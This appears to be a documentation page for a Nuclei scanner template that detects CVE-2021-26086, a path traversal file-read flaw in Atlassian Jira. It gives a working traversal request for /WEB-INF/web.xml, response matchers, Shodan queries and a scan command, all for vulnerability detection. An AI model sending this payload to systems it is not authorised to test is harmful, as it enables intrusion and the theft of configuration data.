Atlassian Jira Limited - Local File Inclusion
ID: CVE-2021-26086
Severity: medium
Author: cocxanh
Tags: cve2021,cve,lfi,packetstorm,jira,intrusive,atlassian,kev
Description
Section titled “Description”Affected versions of Atlassian Jira Limited Server and Data Center are vulnerable to local file inclusion because they allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.
YAML Source
Section titled “YAML Source”id: CVE-2021-26086
info: name: Atlassian Jira Limited - Local File Inclusion author: cocxanh severity: medium description: Affected versions of Atlassian Jira Limited Server and Data Center are vulnerable to local file inclusion because they allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. impact: | This vulnerability can result in unauthorized access to sensitive files and data, as well as potential remote code execution, leading to a complete compromise of the affected system. remediation: | Apply the latest security patches and updates provided by Atlassian to mitigate this vulnerability. reference: - https://jira.atlassian.com/browse/JRASERVER-72695 - http://packetstormsecurity.com/files/164405/Atlassian-Jira-Server-Data-Center-8.4.0-File-Read.html - https://nvd.nist.gov/vuln/detail/CVE-2021-26086 - https://github.com/ARPSyndicate/cvemon - https://github.com/Jeromeyoung/CVE-2021-26086 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-26086 cwe-id: CWE-22 epss-score: 0.91202 epss-percentile: 0.98861 cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: atlassian product: jira_data_center shodan-query: - http.component:"Atlassian Jira" - http.component:"atlassian jira" tags: cve2021,cve,lfi,packetstorm,jira,intrusive,atlassian,kev
http: - method: GET path: - "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"
matchers-condition: and matchers: - type: word part: body words: - <web-app - </web-app> condition: and
- type: status status: - 200# digest: 4a0a00473045022100d6aa8f8ca689daf8f8e23c5fe0161cfda28363b48b7760d60b77ec36a5f122ee0220606b74a1793b9385612c03afb498f76238d46a16656f9c184a41d731fce0327e:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-26086.yaml"